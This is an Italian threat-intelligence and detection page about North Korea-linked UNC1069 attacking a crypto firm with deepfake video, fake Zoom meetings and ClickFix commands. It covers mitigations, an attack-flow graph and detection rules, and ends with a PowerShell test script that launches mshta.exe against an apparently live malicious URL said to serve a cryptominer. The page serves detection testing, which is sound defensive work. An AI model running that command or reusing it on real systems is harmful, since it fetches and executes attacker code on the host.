UNC1069 Colpisce Il Settore Delle Criptovalute Con Nuovi Strumenti e Social Engineering Abilitato dall’AI
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
UNC1069 collegato alla Corea del Nord ha preso di mira una FinTech crypto utilizzando un’intrusione a più fasi che ha combinato video deepfake generati da AI, account Telegram compromessi e una falsa riunione su Zoom per spingere le vittime a eseguire comandi malevoli.
Indagine
Mandiant ha identificato sette famiglie di malware su un host macOS, tra cui i nuovi SILENCELIFT, DEEPBREATH e CHROMEPUSH, oltre al noto downloader SUGARLOADER. La catena è iniziata con un comando in stile ClickFix che ha recuperato un payload da un dominio malevolo, poi si è evoluta attraverso loader e backdoor che rubavano credenziali, dati del browser e contenuti di messaggistica. Le fasi successive hanno utilizzato un’esecuzione modulare residente in memoria per minimizzare le tracce su disco.
Mitigazione
Rafforzare la verifica attraverso i canali di ingegneria sociale, limitare l’esecuzione di script non firmati e monitorare l’uso anomalo di curl o mshta. Su macOS, applicare il controllo di firma del codice e dei launch-daemon e auditare i permessi TCC e le directory dei native-messaging host per file sconosciuti.
Risposta
Isolare l’endpoint, preservare gli artefatti da riga di comando, recuperare il plist del launch-daemon malevolo e bloccare tutti i domini C2 identificati. Resettare il portachiavi, il browser e le credenziali di Telegram e completare una ricerca per rilevare loader residui. Rivedere gli account colpiti per accessi non autorizzati e coordinare la contenzione.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#99ff99 %% Nodes action_initial_access["<b>Azione</b> – <b>T1204.001 Esecuzione Utente</b>: Link malevolo consegnato tramite account Telegram compromesso e falsa riunione Zoom<br/><b>Descrizione</b>: La vittima ha copiato ed eseguito stringhe di comando"] class action_initial_access action tool_telegram["<b>Strumento</b> – <b>Nome</b>: Telegram (compromesso)<br/><b>Ruolo</b>: Canale di consegna per il link malevolo"] class tool_telegram tool tool_zoom["<b>Strumento</b> – <b>Nome</b>: Zoom (riunione falsificata)<br/><b>Ruolo</b>: Vettore di ingegneria sociale"] class tool_zoom tool action_execution_unix_shell["<b>Azione</b> – <b>T1059.004 Unix Shell</b>: Esegui comando curl tramite zsh per scaricare WAVESHAPER<br/><b>Descrizione</b>: Scarica e esegue backdoor"] class action_execution_unix_shell action tool_curl["<b>Strumento</b> – <b>Nome</b>: curl<br/><b>Scopo</b>: Recuperare payload remoto"] class tool_curl tool malware_waveshaper["<b>Malware</b> – <b>Nome</b>: WAVESHAPER<br/><b>Funzione</b>: Backdoor scaricata e eseguita"] class malware_waveshaper malware action_execution_mshta["<b>Azione</b> – <b>T1218.005 Esecuzione Mshta Proxy</b>: Usa mshta per recuperare e far funzionare il downloader HYPERCALL"] class action_execution_mshta action tool_mshta["<b>Strumento</b> – <b>Nome</b>: mshta<br/><b>Scopo</b>: Esegui applicazione HTML remota"] class tool_mshta tool malware_hypercall["<b>Malware</b> – <b>Nome</b>: HYPERCALL<br/><b>Funzione</b>: Downloader eseguito tramite mshta"] class malware_hypercall malware process_launch_daemon["<b>Processo</b> – <b>T1543.004 Launch Daemon</b>: com.apple.system.updater<br/><b>Scopo</b>: Esegue SUGARLOADER all’avvio del sistema"] class process_launch_daemon process malware_sugarloader["<b>Malware</b> – <b>Nome</b>: SUGARLOADER<br/><b>Funzione</b>: Componente persistente"] class malware_sugarloader malware action_defense_evasion["<b>Azione</b> – <b>T1027.004 Compilare Dopo Consegna</b>: Cripta configurazione con RC4 per nascondere URL C2"] class action_defense_evasion action malware_deepbreath["<b>Malware</b> – <b>Nome</b>: DEEPBREATH<br/><b>Capacità</b>: Accesso a Keychain e store del browser"] class malware_deepbreath malware action_cred_keychain["<b>Azione</b> – <b>T1555.001 Keychain</b>: Estrai credenziali da macOS Keychain"] class action_cred_keychain action action_cred_browser["<b>Azione</b> – <b>T1555.003 Web Browser</b>: Estrai cookie, login, estensioni da Chrome Brave Edge"] class action_cred_browser action malware_chromepush["<b>Malware</b> – <b>Nome</b>: CHROMEPUSH<br/><b>Capacità</b>: Keylogger come estensione del browser"] class malware_chromepush malware action_keylogging["<b>Azione</b> – <b>T1056.001 Keylogging</b>: Cattura battiture tramite estensione malevola"] class action_keylogging action action_local_staging["<b>Azione</b> – <b>T1074.001 Archiviazione Dati Locali</b>: Memorizza i dati raccolti in directory temporanee"] class action_local_staging action action_remote_staging["<b>Azione</b> – <b>T1074.002 Archiviazione Dati Remoti</b>: Carica i dati archiviati nel C2 utilizzando curl"] class action_remote_staging action action_c2_http["<b>Azione</b> – <b>T1102.003 Servizio Web Oneu2011Way</b>: Invia dati esfiltrati tramite HTTP POST"] class action_c2_http action action_exfiltration["<b>Azione</b> – <b>T1020 Esfiltrazione Automatica</b>: Caricamento automatico dei dati ai server C2"] class action_exfiltration action %% Connections action_initial_access –>|uses| tool_telegram tool_telegram –>|delivers link to| tool_zoom tool_zoom –>|leads to| action_execution_unix_shell action_execution_unix_shell –>|executes| tool_curl tool_curl –>|downloads| malware_waveshaper malware_waveshaper –>|triggers| action_defense_evasion action_initial_access –>|also triggers| action_execution_mshta action_execution_mshta –>|uses| tool_mshta tool_mshta –>|retrieves| malware_hypercall malware_hypercall –>|installs| process_launch_daemon process_launch_daemon –>|starts| malware_sugarloader malware_sugarloader –>|loads| malware_deepbreath malware_deepbreath –>|performs| action_cred_keychain malware_deepbreath –>|performs| action_cred_browser malware_deepbreath –>|installs| malware_chromepush malware_chromepush –>|executes| action_keylogging action_keylogging –>|stores data in| action_local_staging action_local_staging –>|uploads via curl to| action_remote_staging action_remote_staging –>|sends data to| action_c2_http action_c2_http –>|facilitates| action_exfiltration %% Class assignments class action_initial_access,action_execution_unix_shell,action_execution_mshta,action_defense_evasion,action_cred_keychain,action_cred_browser,action_keylogging,action_local_staging,action_remote_staging,action_c2_http,action_exfiltration action class tool_telegram,tool_zoom,tool_curl,tool_mshta tool class malware_waveshaper,malware_hypercall,malware_sugarloader,malware_deepbreath,malware_chromepush malware class process_launch_daemon process "
Flusso di Attacco
Individuazioni
Possibile Tentativo di Enumerazione System_profiler (via process_creation)
Visualizza
Comportamento Sospetto di Evasione della Difesa LOLBAS MSHTA tramite Rilevazione di Comandi Associati (via process_creation)
Visualizza
Possibile Tentativo di Enumerazione degli Aggiornamenti di Sistema (via process_creation)
Visualizza
Tentativo di Esecuzione di Curl Sospetta [MacOS] (via cmdline)
Visualizza
PnPtUtil per l’Enumerazione dei Dispositivi (via cmdline)
Visualizza
Possibile Enumerazione del Sistema (via cmdline)
Visualizza
IOC (HashMd5) per rilevare: Il Settore delle Criptovalute Obiettivo di UNC1069 con Nuovi Strumenti e Ingegneria Sociale Abilitata dall’AI
Visualizza
IOC (HashSha256) per rilevare: Il Settore delle Criptovalute Obiettivo di UNC1069 con Nuovi Strumenti e Ingegneria Sociale Abilitata dall’AI
Visualizza
Vettore di Infezione UNC1069 su MacOS tramite ClickFix [Creazione Processi in Linux]
Visualizza
Esecuzione di Comandi di Attacco UNC1069 ClickFix [Creazione Processi in Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo di Telemetria & Baseline Pre-volo deve essere stato superato.
Motivo: Questa sezione descrive l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa dell’Attacco & Comandi:
L’avversario, avendo ottenuto un iniziale punto d’appoggio tramite un’email di phishing, sfruttamshtaper recuperare un’applicazione HTML malevola dahttps://mylingocoin.com/audio/fix/6454694440. Questo file HTA contiene un payload PowerShell che installa un miner di criptovaluta. Prima di lanciare l’HTA, l’attaccante eseguesetx audio_volume 100per garantire che il sottosistema audio si trovi in uno stato noto (alcune varianti della campagna ClickFix manipolano le impostazioni audio per nascondere i pop-up). Entrambi i comandi vengono eseguiti direttamente in una console PowerShell, producendo campi CommandLine che corrispondono esattamente alla regola Sigma. -
Script di Test di Regressione:
# Simulazione Attacco UNC1069 ClickFix – attiva regola Sigma # Passo 1: Persistere una variabile di ambiente dall'aspetto innocuo (corrisponde al rilevamento) setx audio_volume 100 # Passo 2: Eseguire HTA malevolo – URL esatto utilizzato nel rilevamento della regola $maliciousUrl = "https://mylingocoin.com/audio/fix/6454694440" Start-Process -FilePath "mshta.exe" -ArgumentList $maliciousUrl # Facoltativo: attendere alcuni secondi per lanciamenti HTA Start-Sleep -Seconds 5 -
Comandi di Pulizia:
# Rimuovere la variabile di ambiente impostata in precedenza reg delete "HKCUEnvironment" /v "audio_volume" /f # Terminare eventuali processi mshta in sospeso generati dal test Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force